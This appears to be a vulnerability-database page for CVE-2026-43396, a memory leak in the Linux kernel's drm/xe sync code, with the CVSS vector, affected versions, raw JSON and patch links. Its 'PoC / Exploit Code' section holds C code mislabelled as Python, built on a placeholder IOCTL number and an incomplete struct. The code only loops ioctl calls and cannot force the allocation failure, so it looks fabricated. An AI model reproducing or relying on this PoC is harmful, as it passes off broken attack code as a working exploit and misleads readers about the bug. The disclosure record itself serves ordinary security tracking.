Security Vulnerability Report
中文
CVE-2026-43396 CVSS 5.5 MEDIUM

CVE-2026-43396

Published: 2026-05-08 15:16:51
Last Modified: 2026-05-21 19:32:28
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: drm/xe/sync: Fix user fence leak on alloc failure When dma_fence_chain_alloc() fails, properly release the user fence reference to prevent a memory leak. (cherry picked from commit a5d5634cde48a9fcd68c8504aa07f89f175074a0)

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.18:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.18:rc5:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.18:rc6:*:*:*:*:*:* - VULNERABLE
Linux Kernel (包含drm/xe驱动的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-43396: User fence leak on alloc failure * This code attempts to trigger the memory leak by interacting with the DRM device. * Note: Actual exploitation requires specific kernel configurations and triggering conditions. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> // Placeholder for the actual device path and IOCTL definitions #define DRM_DEVICE "/dev/dri/renderD128" #define DRM_IOCTL_XE_EXEC 0x00 // Placeholder, replace with actual IOCTL struct drm_xe_exec { __u64 extensions; // Pointer to exec array __u32 num_syncs; // Number of sync objects // ... other fields }; int main() { int fd = open(DRM_DEVICE, O_RDWR); if (fd < 0) { perror("Failed to open DRM device"); return 1; } printf("Starting PoC for CVE-2026-43396...\n"); // Loop to repeatedly trigger the allocation failure path for (int i = 0; i < 100000; i++) { struct drm_xe_exec exec = {0}; // Craft input to potentially trigger alloc failure logic // In a real scenario, this might involve exhausting specific memory pools // or providing parameters that lead to dma_fence_chain_alloc() failing. // Call the IOCTL if (ioctl(fd, DRM_IOCTL_XE_EXEC, &exec) != 0) { // Failure is expected or induced to hit the leak path // perror("IOCTL failed"); } } close(fd); printf("PoC finished. Monitor kernel memory for leaks (slabtop, etc.).\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43396", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:51.010", "lastModified": "2026-05-21T19:32:28.120", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/sync: Fix user fence leak on alloc failure\n\nWhen dma_fence_chain_alloc() fails, properly release the user fence\nreference to prevent a memory leak.\n\n(cherry picked from commit a5d5634cde48a9fcd68c8504aa07f89f175074a0)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18.1", "versionEndExcluding": "6.18.20", "matchCriteriaId": "2939340B-318A-4690-9965-6C309EF2A165"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.9", "matchCriteriaId": "E825E7C3-FEAC-4FD3-8A81-78D7387948C9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.18:-:*:*:*:*:*:*", "matchCriteriaId": "DCE57113-2223-4308-A0F2-5E6ECFBB3C23"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.18:rc5:*:*:*:*:*:*", "matchCriteriaId": "2545FB83-C4A6-4F62-9ED1-09F75D2E3C78"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.18:rc6:*:*:*:*:*:*", "matchCriteriaId": "E955EC5D-4684-4B5D-AE4D-F2BF9ADDBA1D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.18:rc7:*:*:*:*:*:*", "matchCriteriaId": "38C4D89F-9A13-4D29-8645-C9785C142C07"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/05edc78eb4699e8e000a62aaa8dace50a17e19e3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/0879c3f04f67e2a1677c25dcc24669ce21eb6a6c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f8f90b33934b307f6e4599b9fae38aa1ee5441a7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.